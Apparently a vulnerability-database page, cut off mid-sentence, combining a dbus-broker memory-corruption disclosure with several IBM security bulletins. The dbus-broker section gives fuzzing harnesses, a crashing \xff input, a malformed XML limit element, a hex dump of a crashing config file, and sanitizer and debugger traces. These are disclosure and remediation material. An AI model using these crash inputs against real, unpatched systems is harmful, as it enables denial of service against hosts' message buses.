An issue was discovered in dbus-broker before 31. Multiple NULL pointer dereferences can be found when supplying a malformed XML config file.

Multiple memory corruption vulnerabilities were identified in dbus-broker, the standard dbus implementation for Fedora-based systems. Supplying malformed service or config files will cause the dbus-broker to crash or to overread memory boundaries.

**Vendor description**

_"The dbus-broker project is an implementation of a message bus as defined by the D-Bus specification. Its aim is to provide high performance and reliability, while keeping compatibility to the D-Bus reference implementation.It is exclusively written for Linux systems, and makes use of many modern features provided by recent linux kernel releases."_ 

Source: https://github.com/bus1/dbus-broker

**Business recommendation**

The vendor provides a patch which should be installed immediately. 

**Vulnerability overview/description****1) Stack-Buffer Over-Read (CVE-2022-31212) **

Dbus-Broker depends on c-uitl/c-shquote to parse DBus service's Exec line. c-shquote contains a stack buffer over-read if a malicious Exec line is supplied. 

**2) Null Pointer Dereference (CVE-2022-31213) **

Multiple Null Pointer references can be found when supplying a malformed XML config file. 

**Proof of concept****1) Stack-Buffer Over-Read (CVE-2022-31212) **

Following harness was used to fuzz the function **c\_shquote\_parse\_argv()** as it is used in **src/launch/launcher.c of dbus-broker.** 

    #include <sys/types.h> 
    #include <unistd.h> 
    #include <stdio.h> 
    #include <string.h> 
    #include "c-shquote.h" 
    
    #define SIZE_65KB 66560 
    
    int main(int argc, char** argv) { 
      char fuzz_buf[SIZE_65KB] = ""; 
      ssize_t fuzz_len = read(STDIN_FILENO, fuzz_buf, SIZE_65KB); 
      char **out_argv; 
      ssize_t out_argc; 
      c_shquote_parse_argv(&out_argv, &out_argc, fuzz_buf, strlen(fuzz_buf)); 
      return 0; 
    } 

Passing \\xff to the STDIN of the testharness will cause following crash: 

    ==21744==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff98c675bf at pc 
    0x558e29cacc02 bp 0x7fff98c67490 sp 0x7fff98c67488 
    READ of size 1 at 0x7fff98c675bf thread T0 
    #0 0x558e29cacc01 in c_shquote_strncspn c-shquote/src/c-shquote.c:119:21 
    #1 0x558e29caff15 in c_shquote_parse_next c-shquote/src/c-shquote.c:540:31 
    #2 0x558e29cb09c2 in c_shquote_parse_argv c-shquote/src/c-shquote.c:620:21 
    #3 0x558e29cab7e9 in c-shquote/src/argv_parser.c:23:2 
    #4 0x7f07953a8b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24) 
    #5 0x558e29bca15d in _start (c-shquote/src/harness_argv_parser+0x2015d) 
    Address 0x7fff98c675bf is located in stack of thread T0 at offset 287 in frame 
    #0 0x558e29cac54f in c_shquote_strncspn c-shquote/src/c-shquote.c:102 
    This frame has 1 object(s): 
    [32, 287) 'buffer' (line 103) <== Memory access at offset 287 overflows this variable 
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, 
    swapcontext or vfork 
    (longjmp and C++ exceptions *are* supported) 
    SUMMARY: AddressSanitizer: stack-buffer-overflow c-shquote/src/c-shquote.c:119:21 in 
    c_shquote_strncspn 
    Shadow bytes around the buggy address: 
    0x100073184e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184e90: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 
    0x100073184ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    =>0x100073184eb0: 00 00 00 00 00 00 00[07]f3 f3 f3 f3 f3 f3 f3 f3 
    0x100073184ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184ed0: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 
    0x100073184ee0: 00 f2 f2 f2 00 f3 f3 f3 00 00 00 00 00 00 00 00 
    0x100073184ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184f00: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 
    Shadow byte legend (one shadow byte represents 8 application bytes): 
    Addressable: 00 
    Partially addressable: 01 02 03 04 05 06 07 
    Heap left redzone: fa 
    Freed heap region: fd 
    Stack left redzone: f1 
    Stack mid redzone: f2 
    Stack right redzone:f3 
    Stack after return:  f5 
    Stack use after scope: f8 
    Global redzone: f9 
    Global init order: f6 
    Poisoned by user: f7 
    Container overflow: fc 
    Array cookie: ac 
    Intra object redzone: bb 
    ASan internal: fe 
    Left alloca redzone: ca 
    Right alloca redzone: cb 
    ==21744==ABORTING 

The error occurs in the functions  **c\_shquote\_strnspn() and c\_shquote\_strncspn().** 

Both allocate a buffer like this: 

    bool buffer[UCHAR_MAX] = {}; 

UCHAR\_MAX is defined in the C standard header limits.h and equals 255. Thus, array indexes of 0-254 can be addressed. 

However, the buffer will then be accessed like this:   

**buffer\[(unsigned char)string\[i\]\],** where string is the commandline from STDIN (or the EXEC line in case of dbus-broker services). 

Passing **\\xff** will thus read an out of bounds array element. 

**2) Null Pointer Dereference (CVE-2022-31213) **

The dbus-broker config parser uses the expat library to parse XML files. 

**<limit name="max\_pendingonment"/>** is a valid XML line. Thus expat will parse it correctly. As no value is supplied in the statement, the limit\_max\_pendingonment parameter will contain a Null pointer. DBus-broker does not validate the result and tries to dereference the field, causing a crash. Multiple other XML edge case can be found that cause the expat library to correctly return a Null pointer, but are not handled correctly by the dbus-broker. 

Including **<limit name="max\_pendingonment"/>**  causes following error message: 

    Program received signal SIGSEGV, Segmentation fault. 
    0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6 
    Missing separate debuginfos, use: yum debuginfo-install expat-2.2.5-4.el8.x86_64 libblkid- 
    2.32.1-28.el8.x86_64 libcap-2.26-5.el8.x86_64 libgcc-8.5.0-4.el8_5.x86_64 libmount-2.32.1- 
    28.el8.x86_64 libselinux-2.9-5.el8.x86_64 libuuid-2.32.1-28.el8.x86_64 pcre2-10.32- 
    2.el8.x86_64 sssd-client-2.5.2-2.el8_5.1.x86_64 systemd-libs-239-51.el8.x86_64 
    (gdb) bt 
    #0 0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6 
    #1 0x000000000040cf0a in util_strtou64 (valp=valp@entry=0x828bc8, string=0x0) at 
    ../src/util/string.c:42 
    #2 0x0000000000408f07 in config_parser_end_fn (userdata=0x7fffffffdf58, name=0x82278c 
    "limit") at ../src/launch/config.c:1140 
    #3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1 
    #4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1 
    #5 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1 
    #6 0x000000000040425f in config_parser_include (parser=0x7fffffffdf50, root=0x0, 
    node=<optimized out>, nss_cache=0x7fffffffdf30, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1289 
    #7 config_parser_read (parser=parser@entry=0x7fffffffdf50, rootp=rootp@entry=0x7fffffffdf28, 
    path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf30, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1347 
    #8 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe098) at 
    ../src/launch/harness-config.c:24 

Following harness was used: 

    #include <c-list.h> 
    #include <c-stdaux.h> 
    #include <stdlib.h> 
    #include "launch/config.h" 
    #include "launch/nss-cache.h" 
    #include "util/dirwatch.h" 
    
    int main(int argc, char **argv) { 
    _c_cleanup_(config_parser_deinit) ConfigParser parser = CONFIG_PARSER_NULL(parser); 
    _c_cleanup_(config_root_freep) ConfigRoot *rootp = NULL; 
    _c_cleanup_(nss_cache_deinit) NSSCache nss_cache = NSS_CACHE_INIT; 
    _c_cleanup_(dirwatch_freep) Dirwatch *dirwatch = NULL; 
    int r; 
    r = dirwatch_new(&dirwatch); 
    config_parser_init(&parser); 
    r = config_parser_read(&parser, &rootp, argv[1], &nss_cache, dirwatch); 
    return 0; 
    } 

Following config file will cause another error: 

    00000000: 3c21 2d2d 202d 2d3e 0a0a 3c21 444f 4354  ..<!DOCT 
    00000010: 5950 4520 6720 5055 424c 4943 2022 2d2f  YPE g PUBLIC "-/ 
    00000020: 4e22 0a20 2268 7474 223e 0a3c 6275 7363  N". "htt">.<busc 
    00000030: 6f6e 6669 673e 0a0a 203c 7479 7065 3e73  onfig>.. <type>s 
    00000040: 643c 2f74 7970 653e 3c66 6f72 6b2f 3e0a  d</type><fork/>. 
    00000050: 203c 7374 616e 6461 7264 5f73 7973 e803   <standard_sys.. 
    00000060: 6d5f 7365 7276 6963 6564 6972 732f 3e0a  m_servicedirs/>. 
    00000070: 203c 7365 7276 6963 6564 6972 2072 6563   <servicedir rec 
    00000080: 6569 7665 5f74 7970 653d 2265 7272 6f72  eive_type="error 
    00000090: 222f 3e0a 3c61 6c6c 6f77 2072 6563 6569  "/>.<allow recei 
    000000a0: 7665 5f74 7970 653d 2273 6967 6e61 6c22  ve_type="signal" 
    000000b0: 2f3e 2d3e 203c 616c 6c6f 7720 7365 6e64  />-> <allow send 
    000000c0: 5f64 6573 7469 6e61 7469 6f6e 3d22 220a  _destination="". 
    000000d0: 2020 2073 656e 645f 696e 7465 7266 6163     send_interfac 
    000000e0: 653d 2222 202f 3e0a 3c61 6c6c 6f77 2073  e="" />.<allow s 
    000000f0: 656e 645f 6465 7374 696e 617d 696f 6e3d  end_destina}ion= 
    00000100: 2222 0a20 2020 7365 6e64 5f69 6e74 6572  "".   send_inter 
    00000110: 6661 6365 3d22 6f72 6522 2f3e 203c 212d  face="ore"/> <!- 
    00000120: 2d20 2d2d 3e20 3c64 656e 7920 7365 6e64  - --> <deny send 
    00000130: 5f64 6573 74                             _dest 

The error is following: 

    id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 
    Unknown element in /fuzzing_Data/dbus-broker-config/out/harness-config2-- 
    /crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +8: 
    standard_sysm_servicedirs 
    Unknown attribute in /fuzzing_Data/dbus-broker-config/out/harness-config2-- 
    /crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +9: 
    receive_type="error" 
    Program received signal SIGSEGV, Segmentation fault. 
    0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6 
    #0 0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6 
    #1 0x00007ffff78714e2 in strdup () from /lib64/libc.so.6 
    #2 0x0000000000408e96 in config_parser_end_fn (userdata=0x7fffffffdf48, name=0x81b45c 
    "servicedir") at ../src/launch/config.c:1130 
    #3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1 
    #4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1 
    #5 0x00007ffff7b9fb6b in doProlog () from /lib64/libexpat.so.1 
    #6 0x00007ffff7ba0a5f in prologProcessor () from /lib64/libexpat.so.1 
    #7 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1 
    #8 0x000000000040425f in config_parser_include (parser=0x7fffffffdf40, root=0x0, 
    node=<optimized out>, nss_cache=0x7fffffffdf20, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1289 
    #9 config_parser_read (parser=parser@entry=0x7fffffffdf40, rootp=rootp@entry=0x7fffffffdf18, 
    path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf20, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1347 
    #10 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe088) at 
    ../src/launch/harness-config.c:24 

**Vulnerable / tested versions**

The Git Master branch (dbus-broker-29) has been tested and found to be vulnerable (tested at commit 727bee57cd3e3b5806eb8599abbdd49984b75732). 

Furthermore, it also contains the vulnerable c-shquote library (tested at commit 83ccc2893385fcca1424b188f0f6c45a62f2b38d). 

**Vendor contact timeline**

CVE-2022-31213: Multiple Memory Corruption Vulnerabilities in dbus-broker

IBM Security Verify Identity Manager 10.0 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 224918.

  

**Summary**

IBM Security Verify Governance, Identity Manager virtual appliance component has addressed the following vulnerabilities

**Vulnerability Details**

**CVEID:**   CVE-2022-22453  
**DESCRIPTION:**   IBM Security Verify Identity Manager uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  
CVSS Base score: 5.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/224919 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2022-22450  
**DESCRIPTION:**   IBM Security Verify Identity Manager could allow a privileged user to upload a malicious file by bypassing extension security in an HTTP request.  
CVSS Base score: 3.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/224916 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N)

**CVEID:**   CVE-2022-22452  
**DESCRIPTION:**   IBM Security Verify Identity Manager uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/224918 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-22460  
**DESCRIPTION:**   IBM Security Verify Identity Manager contains sensitive information in the source code reposititory that could be used in further attacks against the system.  
CVSS Base score: 3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225013 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Security Verify Governance, Identity Manager virtual appliance component

10.0

  

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

John Zuccato, Rodney Ryan, Chris Shepherd, Nathan Roane, Vince Dragnea, Troy Fisher, Gabor Minyo, Geoffrey Owden, and Ben Goodspeed from the IBM Security Ethical Hacking Team.

**Change History**

12 Jul 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSRMWJ","label":"IBM Security Identity Manager"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"IBM Security Verify Governance, Identity Manager virtual appliance component","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2022-22452: Security Bulletin: security vulnerabilities have been fixed in IBM Security Verify Governance, Identity Manager virtual appliance component

IBM Security Verify Identity Manager 10.0 contains sensitive information in the source code repository that could be used in further attacks against the system. IBM X-Force ID: 225013.

CVE-2022-22460: IBM Security Verify Identity Manager information disclosure CVE-2022-22460 Vulnerability Report

IBM Security Verify Identity Manager 10.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 224919.

CVE-2022-22453: IBM Security Verify Identity Manager information disclosure CVE-2022-22453 Vulnerability Report

IBM WebSphere Application Server 8.5 and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 225605.

**Security Bulletin**

  

**Summary**

IBM WebSphere Application Server is vulnerable to cross-site scripting in the Admin Console. This has been addressed.

**Vulnerability Details**

**CVEID:**   CVE-2022-22477  
**DESCRIPTION:**   IBM WebSphere Application Server is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 6.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225605 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM WebSphere Application Server

9.0

IBM WebSphere Application Server

8.5

**Remediation/Fixes**

 IBM strongly recommends addressing the vulnerability now by applying a currently available interim fix or fix pack that contains the APAR PH46332.

**For IBM WebSphere Application Server traditional:**

**For V9.0.0.0 through 9.0.5.12:**  
· Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix  PH46332  
\--OR--  
· Apply Fix Pack 9.0.5.13 or later (targeted availability 3Q2022). 

**For V8.5.0.0 through 8.5.5.21:**  
· Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PH46332  
\--OR--  
· Apply Fix Pack 8.5.5.22 or later (targeted availability 3Q2022). 

Additional interim fixes may be available and linked off the interim fix download page.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

The vulnerability was reported to IBM by Lukasz Plonka.

**Change History**

13 July 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSEQTP","label":"WebSphere Application Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF010","label":"HP-UX"},{"code":"PF012","label":"IBM i"},{"code":"PF016","label":"Linux"},{"code":"PF027","label":"Solaris"},{"code":"PF033","label":"Windows"},{"code":"PF035","label":"z\\/OS"}\],"Version":"7.0, 8.0, 8.5, 9.0","Edition":"Advanced,Base,Developer,Enterprise,Express,Network Deployment,Single Server","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-22477: IBM WebSphere Application Server is vulnerable to Cross-site Scripting (CVE-2022-22477)

IBM Security Verify Information Queue 10.0.2 could allow an authenticated user to cause a denial of service with a specially crafted HTTP request.

CVE-2022-35283: IBM Security Verify Information Queue denial of service CVE-2022-35283 Vulnerability Report

IBM Engineering Lifecycle Optimization - Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 could disclose highly sensitive information through an HTTP GET request to an authenticated user. IBM X-Force ID: 213728.

  

**Summary**

IBM Engineering Lifecycle Optimization - Publishing Document Builder uses the POST method to submit passwords but can be forced to use the GET method also. Highly sensitive information can be disclosed through an HTTP GET request to an authenticated user(CVE-2021-39019)

**Vulnerability Details**

**CVEID:**   CVE-2021-39019  
**DESCRIPTION:**   IBM Engineering Lifecycle Optimization - Publishing could disclose highly sensitive information through an HTTP GET request to an authenticated user.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/213728 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

PUB

7.0.1

PUB

7.0.2

RPE

6.0.6

RPE

6.0.6.1

PUB

7.0

  

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

08 Jul 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSUBFB","label":"IBM Engineering Lifecycle Optimization - Publishing"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF016","label":"Linux"}\],"Version":"6.0.6, 6.0.6.1, 7.0, 7.0.1, 7.0.2","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

CVE-2021-39019: Security Bulletin: IBM Engineering Lifecycle Optimization

IBM Engineering Lifecycle Optimization - Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 213866.

CVE-2021-39028: IBM Engineering Lifecycle Optimization HOST header injection CVE-2021-39028 Vulnerability Report

IBM Engineering Lifecycle Optimization - Publishing 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 213655.

**Security Bulletin**

  

**Summary**

IBM Engineering Lifecycle Optimization - Publishing is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. CVE-2021-39015.

**Vulnerability Details**

**CVEID:**   CVE-2021-39015  
**DESCRIPTION:**   IBM Engineering Lifecycle Optimization - Publishing is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/213655 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)  
**

IBM Engineering Lifecycle Optimization - Publishing

7.0

IBM Engineering Lifecycle Optimization - Publishing

7.0.1

IBM Engineering Lifecycle Optimization - Publishing

7.0.2

  

**Workarounds and Mitigations**

**None**

**References**

Off

**Change History**

06 Jul 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSUBFB","label":"IBM Engineering Lifecycle Optimization - Publishing"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF016","label":"Linux"}\],"Version":"7.0,7.0.1,7.0.2","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSUBFB","label":"IBM Engineering Lifecycle Optimization - Publishing"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF016","label":"Linux"}\],"Version":"7.0,7.0.1,7.0.2","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

CVE-2021-39015: Security Bulletin: IBM Engineering Lifecycle Optimization

IBM Engineering Lifecycle Optimization - Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 could disclose sensitive information in a SQL error message that could aid in further attacks against the system. IBM X-Force ID: 213726.

  

**Summary**

UI validation to Folder Name field is missing in IBM Engineering Lifecycle Optimization - Publishing Document Builder, resulting in display of SQL error to UI. This indicates the presence of SQL injection vulnerability. (CVE-2021-39018)

**Vulnerability Details**

**CVEID:**   CVE-2021-39018  
**DESCRIPTION:**   IBM Engineering Lifecycle Optimization - Publishing could disclose sensitive information in a SQL error message that could aid in further attacks against the system.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/213726 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

PUB

7.0.1

PUB

7.0.2

RPE

6.0.6

RPE

6.0.6.1

PUB

7.0

  

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

08 Jul 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a 